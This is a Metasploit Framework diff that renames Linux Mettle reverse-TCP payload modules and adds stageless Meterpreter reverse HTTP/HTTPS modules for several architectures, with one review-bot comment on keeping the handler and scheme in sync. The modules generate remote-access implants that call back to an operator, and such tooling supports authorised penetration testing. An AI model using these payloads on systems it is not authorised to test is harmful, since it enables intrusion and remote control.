@@ -21,10 +20,11 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Run the mettle server payload (stageless)', + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ - 'Adam Cammack ' + 'Adam Cammack ', + 'Brent Cook ' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPS64, @@ -36,6 +36,7 @@ module MetasploitModule end def generate - MetasploitPayloads::Mettle.new('mips64-linux-muslsf', generate_config).to_binary :exec + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('mips64-linux-muslsf', generate_config(opts)).to_binary :exec end end diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..da77150e78 --- /dev/null +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb 
@@ -0,0 +1,42 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_http'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_mipsbe_linux'
+
+module MetasploitModule
+
+ CachedSize = 997900
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter, Reverse HTTP Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook '
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_MIPSBE,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseHttp,
+ 'Session' => Msf::Sessions::Meterpreter_mipsbe_Linux
+ )
+ )
+ end
+
+ def generate
+ opts = {scheme: 'http'}
+ MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb
new file mode 100644
index 0000000000..186eec725c
--- /dev/null
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb
@@ -0,0 +1,42 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_https'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_mipsbe_linux'
+
+module MetasploitModule
+
+ CachedSize = 997900
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook '
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_MIPSBE,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseHttps,
+ 'Session' => Msf::Sessions::Meterpreter_mipsbe_Linux
+ )
+ )
+ end
+
+ def generate
+ opts = {scheme: 'https'}
+ MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/linux/mipsbe/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
similarity index 74%
rename from modules/payloads/singles/linux/mipsbe/mettle_reverse_tcp.rb
rename to modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
index 2e74746dab..e4d453a55c 100644
--- a/modules/payloads/singles/linux/mipsbe/mettle_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
@@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config'
@@ -21,10 +20,11 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Run the mettle server payload (stageless)', + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ - 'Adam Cammack ' + 'Adam Cammack ', + 'Brent Cook ' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE, @@ -36,6 +36,7 @@ module MetasploitModule end def generate - MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config).to_binary :exec + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config(opts)).to_binary :exec end end diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..cad8178fa2 --- /dev/null +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb 
@@ -0,0 +1,42 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_http'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_mipsle_linux'
+
+module MetasploitModule
+
+ CachedSize = 997996
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter, Reverse HTTP Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook '
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_MIPSLE,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseHttp,
+ 'Session' => Msf::Sessions::Meterpreter_mipsle_Linux
+ )
+ )
+ end
+
+ def generate
+ opts = {scheme: 'http'}
+ MetasploitPayloads::Mettle.new('mipsel-linux-muslsf', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb
new file mode 100644
index 0000000000..a2cbb51c1a
--- /dev/null
+++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb
@@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_mipsle_linux' + +module MetasploitModule + + CachedSize = 997996 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSLE, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_mipsle_Linux + ) + ) + end + + def generate + opts = {scheme: 'https'} + MetasploitPayloads::Mettle.new('mipsel-linux-muslsf', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/mipsle/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb similarity index 74% rename from modules/payloads/singles/linux/mipsle/mettle_reverse_tcp.rb rename to modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb index 0a898abb51..d575313a72 100644 --- a/modules/payloads/singles/linux/mipsle/mettle_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' 
@@ -21,10 +20,11 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Run the mettle server payload (stageless)', + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ - 'Adam Cammack ' + 'Adam Cammack ', + 'Brent Cook ' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPSLE, @@ -36,6 +36,7 @@ module MetasploitModule end def generate - MetasploitPayloads::Mettle.new('mipsel-linux-muslsf', generate_config).to_binary :exec + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('mipsel-linux-muslsf', generate_config(opts)).to_binary :exec end end diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..a95ea15d29 --- /dev/null +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb 
@@ -0,0 +1,42 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_http'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_ppc_linux'
+
+module MetasploitModule
+
+ CachedSize = 788788
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter, Reverse HTTP Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook '
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_PPC,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseHttp,
+ 'Session' => Msf::Sessions::Meterpreter_ppc_Linux
+ )
+ )
+ end
+
+ def generate
+ opts = {scheme: 'http'}
+ MetasploitPayloads::Mettle.new('powerpc-linux-muslsf', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb
new file mode 100644
index 0000000000..5e5919de63
--- /dev/null
+++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb
@@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_ppc_linux' + +module MetasploitModule + + CachedSize = 788788 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_PPC, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_ppc_Linux + ) + ) + end + + def generate + opts = {scheme: 'https'} + MetasploitPayloads::Mettle.new('powerpc-linux-muslsf', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/ppc/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb similarity index 74% rename from modules/payloads/singles/linux/ppc/mettle_reverse_tcp.rb rename to modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb index ed7a18a30f..0a97807845 100644 --- a/modules/payloads/singles/linux/ppc/mettle_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' 
@@ -21,10 +20,11 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Run the mettle server payload (stageless)', + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ - 'Adam Cammack ' + 'Adam Cammack ', + 'Brent Cook ' ], 'Platform' => 'linux', 'Arch' => ARCH_PPC, @@ -36,6 +36,7 @@ module MetasploitModule end def generate - MetasploitPayloads::Mettle.new('powerpc-linux-muslsf', generate_config).to_binary :exec + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('powerpc-linux-muslsf', generate_config(opts)).to_binary :exec end end diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..9a14d00ad8 --- /dev/null +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb 
@@ -0,0 +1,42 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_http'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_ppc64le_linux'
+
+module MetasploitModule
+
+ CachedSize = 789888
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter, Reverse HTTP Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook '
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_PPC64LE,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseHttp,
+ 'Session' => Msf::Sessions::Meterpreter_ppc64le_Linux
+ )
+ )
+ end
+
+ def generate
+ opts = {scheme: 'http'}
+ MetasploitPayloads::Mettle.new('powerpc64le-linux-musl', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb
new file mode 100644
index 0000000000..97621306be
--- /dev/null
+++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb
@@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_ppc64le_linux' + +module MetasploitModule + + CachedSize = 789888 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_PPC64LE, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_ppc64le_Linux + ) + ) + end + + def generate + opts = {scheme: 'https'} + MetasploitPayloads::Mettle.new('powerpc64le-linux-musl', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/ppc64le/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb similarity index 74% rename from modules/payloads/singles/linux/ppc64le/mettle_reverse_tcp.rb rename to modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb index bd9c5a0de3..7d27e19744 100644 --- a/modules/payloads/singles/linux/ppc64le/mettle_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' 
@@ -21,10 +20,11 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Run the mettle server payload (stageless)', + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ - 'Adam Cammack ' + 'Adam Cammack ', + 'Brent Cook ' ], 'Platform' => 'linux', 'Arch' => ARCH_PPC64LE, @@ -36,6 +36,7 @@ module MetasploitModule end def generate - MetasploitPayloads::Mettle.new('powerpc64le-linux-musl', generate_config).to_binary :exec + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('powerpc64le-linux-musl', generate_config(opts)).to_binary :exec end end diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..df1b072078 --- /dev/null +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb 
@@ -0,0 +1,42 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_http'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_x64_linux'
+
+module MetasploitModule
+
+ CachedSize = 700032
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter, Reverse HTTP Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook '
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X64,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseHttp,
+ 'Session' => Msf::Sessions::Meterpreter_x64_Linux
+ )
+ )
+ end
+
+ def generate
+ opts = {scheme: 'http'}
+ MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
new file mode 100644
index 0000000000..bfaac682d6
--- /dev/null
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
@@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_x64_linux' + +module MetasploitModule + + CachedSize = 700032 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_X64, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_x64_Linux + ) + ) + end + + def generate + opts = {scheme: 'https'} + MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/x64/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb similarity index 65% rename from modules/payloads/singles/linux/x64/mettle_reverse_tcp.rb rename to modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb index f8c5f7e734..58a8544949 100644 --- a/modules/payloads/singles/linux/x64/mettle_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb @@ -3,11 +3,10 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' -require 'msf/base/sessions/meterpreter_x64_mettle_linux' +require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule 
@@ -21,21 +20,23 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Run the mettle server payload (stageless)', + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ - 'Adam Cammack ' + 'Adam Cammack ', + 'Brent Cook ' ], 'Platform' => 'linux', 'Arch' => ARCH_X64, 'License' => MSF_LICENSE, 'Handler' => Msf::Handler::ReverseTcp, - 'Session' => Msf::Sessions::Meterpreter_x64_Mettle_Linux + 'Session' => Msf::Sessions::Meterpreter_x64_Linux ) ) end def generate - MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config).to_binary :exec + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config(opts)).to_binary :exec end end diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..4e16a425c8 --- /dev/null +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb 
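Review bot: The transport is now stated twice in this module, as `'Handler' => Msf::Handler::ReverseTcp` in `initialize` and as the string in `opts = {scheme: 'tcp'}` in `generate`, and nothing visible in the hunk ties the two together. If one is edited without the other, the embedded configuration and the handler would presumably disagree, and that would only show up at run time. A comment above `generate`, e.g. `# scheme must match the 'Handler' class declared in initialize`, would make the coupling explicit. The same pattern recurs in the other reverse_tcp hunks (mipsbe, mipsle, ppc, ppc64le, x86, zarch) and in the new reverse_http/https files; how `generate_config` uses `:scheme` is defined in mettle_config.rb, outside this hunk.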
@@ -0,0 +1,42 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_http'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_x86_linux'
+
+module MetasploitModule
+
+ CachedSize = 739644
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter, Reverse HTTP Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook '
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X86,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseHttp,
+ 'Session' => Msf::Sessions::Meterpreter_x86_Linux
+ )
+ )
+ end
+
+ def generate
+ opts = {scheme: 'http'}
+ MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
new file mode 100644
index 0000000000..a8f346b575
--- /dev/null
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
@@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_x86_linux' + +module MetasploitModule + + CachedSize = 739644 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_x86_Linux + ) + ) + end + + def generate + opts = {scheme: 'https'} + MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/x86/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb similarity index 65% rename from modules/payloads/singles/linux/x86/mettle_reverse_tcp.rb rename to modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb index a419ab029f..035a13fcb2 100644 --- a/modules/payloads/singles/linux/x86/mettle_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb @@ -3,11 +3,10 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' -require 'msf/base/sessions/meterpreter_x86_mettle_linux' +require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule 
@@ -21,21 +20,23 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Run the mettle server payload (stageless)', + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ - 'Adam Cammack ' + 'Adam Cammack ', + 'Brent Cook ' ], 'Platform' => 'linux', 'Arch' => ARCH_X86, 'License' => MSF_LICENSE, 'Handler' => Msf::Handler::ReverseTcp, - 'Session' => Msf::Sessions::Meterpreter_x86_Mettle_Linux + 'Session' => Msf::Sessions::Meterpreter_x86_Linux ) ) end def generate - MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config).to_binary :exec + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config(opts)).to_binary :exec end end diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..8f85d9d377 --- /dev/null +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb 
@@ -0,0 +1,42 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_http'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_zarch_linux'
+
+module MetasploitModule
+
+ CachedSize = 864336
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter, Reverse HTTP Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook '
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_ZARCH,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseHttp,
+ 'Session' => Msf::Sessions::Meterpreter_zarch_Linux
+ )
+ )
+ end
+
+ def generate
+ opts = {scheme: 'http'}
+ MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
new file mode 100644
index 0000000000..479cdb1b8d
--- /dev/null
+++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
@@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_zarch_linux' + +module MetasploitModule + + CachedSize = 864336 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_ZARCH, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_zarch_Linux + ) + ) + end + + def generate + opts = {scheme: 'https'} + MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/zarch/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb similarity index 74% rename from modules/payloads/singles/linux/zarch/mettle_reverse_tcp.rb rename to 